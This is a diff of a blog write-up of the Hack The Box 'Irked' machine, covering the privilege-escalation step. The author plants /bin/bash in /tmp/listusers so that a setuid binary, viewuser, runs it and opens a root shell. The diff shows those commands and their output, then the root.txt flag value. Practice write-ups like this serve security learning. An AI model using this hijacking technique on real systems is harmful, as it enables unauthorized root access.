1n4r1/1n4r1.github.io/_posts/2019-04-27-Hackthebox-Irked-Writeup.md

 sh: 1: /tmp/listusers: not found
 {% endhighlight %}

-Sounds like we need an input for "viewuser".<br>
+Sounds like we need an input for "viewuser" and shell tries to execute it.<br>
-Try to let this binary read "root.txt".
+Then put a command to "/tmp/listusers".
+We can confirm it is executed.
 {% highlight shell %}
+djmardov@irked:~$ echo /bin/bash > /tmp/listusers
+djmardov@irked:~$ chmod 777 /tmp/listusers
+djmardov@irked:~$ /usr/bin/viewuser
+This application is being devleoped to set and test user permissions It is still being actively developed
+(unknown) :0           2019-04-23 17:05 (:0)
+djmardov pts/0        2019-04-27 15:35 (10.10.14.23)
+root@irked:~#
+{% endhighlight %}

+root.txt is in a directory "/root/".
+{% highlight shell %}
+root@irked:~# cat /root/root.txt
+8d8e9e8be64654b6dccc3bff4522daf3
 {% endhighlight %}